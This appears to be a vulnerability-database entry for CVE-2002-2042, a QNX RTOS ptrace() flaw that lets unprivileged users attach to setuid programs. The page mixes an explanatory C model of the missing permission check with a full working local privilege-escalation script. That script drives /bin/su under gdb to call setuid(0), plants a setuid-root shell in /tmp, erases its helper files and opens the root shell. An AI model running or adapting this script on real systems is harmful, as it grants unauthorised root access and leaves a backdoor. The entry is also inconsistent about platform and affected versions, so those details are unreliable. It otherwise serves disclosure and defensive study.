QNX 'ptrace()' Arbitrary Process Modification Vulnerability

Vulnerability ID: 1106772    Vulnerability type: design error
Published: 2002-06-03    Updated: 2008-09-24
CVE: CVE-2002-2042    CNNVD ID: CNNVD-200212-080
Platform: Linux    CVSS score: 7.2
|Sources
https://www.exploit-db.com/exploits/21507
https://www.securityfocus.com/bid/4919
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-080
|Description
QNX Real-Time Operating System (RTOS) 4.25 and 6.1.0 allow a program to attach to privileged processes. A local user can execute arbitrary code by modifying a running process.
|Exploit (EXP)
source: http://www.securityfocus.com/bid/4919/info

The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges.

This issue affects QNX RTOS 6 prior to 6.4.0.
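The missing check described above is the classic Unix rule that PTRACE_ATTACH is refused unless the tracer's credentials match the target's real, effective and saved ids and the target has not executed a setuid image. The following is an added model of that decision, written for this page; it is not QNX's, Linux's or any kernel's code, and the `proc_creds` struct, its field names and the helper constructors are this example's own assumptions.

```c
#include <stdbool.h>
#include <sys/types.h>

/* Added model of the PTRACE_ATTACH permission check that the advisory says
 * QNX 4.25/6.1 omitted. Not QNX's, Linux's or any kernel's code; the struct,
 * field names and helpers are this example's own. */
struct proc_creds {
    uid_t uid, euid, suid;   /* real, effective and saved user ids */
    gid_t gid, egid, sgid;   /* real, effective and saved group ids */
    bool  dumpable;          /* cleared when a setuid/setgid image is exec'ed */
    bool  cap_sys_ptrace;    /* privileged override (root / CAP_SYS_PTRACE) */
};

/* May `tracer` attach to `target`? An unprivileged tracer is allowed only if
 * the target's real, effective and saved ids all equal the tracer's own real
 * ids, and the target has not run a setuid image since its last exec. */
bool ptrace_may_attach(struct proc_creds tracer, struct proc_creds target)
{
    if (tracer.cap_sys_ptrace)
        return true;                        /* privileged: always allowed */

    bool uid_ok = tracer.uid == target.uid && tracer.uid == target.euid &&
                  tracer.uid == target.suid;
    bool gid_ok = tracer.gid == target.gid && tracer.gid == target.egid &&
                  tracer.gid == target.sgid;
    if (!uid_ok || !gid_ok)
        return false;                       /* different credentials: deny */

    /* The ids match, but a process that exec'ed a setuid image and later
     * dropped back to the caller's ids may still hold privileged state in
     * memory, so the dumpable flag must also be set. */
    return target.dumpable;
}

/* Credentials of an ordinary process owned by uid/gid (constructed sample). */
struct proc_creds plain_proc(uid_t uid, gid_t gid)
{
    struct proc_creds c = { uid, uid, uid, gid, gid, gid, true, false };
    return c;
}

/* Credentials of uid's process after exec'ing a setuid-root image such as su:
 * real uid unchanged, euid/suid 0, dumpable cleared (constructed sample). */
struct proc_creds setuid_root_proc(uid_t uid, gid_t gid)
{
    struct proc_creds c = { uid, 0, 0, gid, gid, gid, false, false };
    return c;
}
```

With this rule in place, the unprivileged debugger session in the exploit below would be refused at the attach step instead of gaining control of the setuid `su` image.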

#!/bin/sh

#include <std_shouts.h>
#include <std_disclaimer.h>
#http://www.badc0ded.com

# Helper script that su will run on the attacker's behalf (appends, not overwrites).
echo "#!/bin/sh" > /tmp/runme
echo cp /bin/sh /tmp/sh >> /tmp/runme
echo chmod 4755 /tmp/sh >> /tmp/runme
chmod 755 /tmp/runme
# gdb command script driving the setuid /bin/su under the debugger.
echo r root -c /tmp/runme > /tmp/badc0ded
echo break *main+44 >> /tmp/badc0ded
echo c >> /tmp/badc0ded
echo "call setuid(0)" >> /tmp/badc0ded
echo c >> /tmp/badc0ded
# The command script lives in /tmp, so reference it by its full path.
gdb /bin/su < /tmp/badc0ded > /dev/null
echo "www.badc0ded.com"
sleep 1
rm /tmp/runme /tmp/badc0ded
/tmp/sh
|Affected products
QNX RTOS 6.3.2, QNX RTOS 6.3, QNX RTOS 6.2.1, QNX RTOS 6.2 Update Patch A, QNX RTOS 6.2, QNX RTOS 6.1, QNX RTOS 6.3.0 SP3
|References

Source: BID
Name: 4919
Link: http://www.securityfocus.com/bid/4919
Source: XF
Name: qnx-rtos-process-modification(9260)
Link: http://www.iss.net/security_center/static/9260.php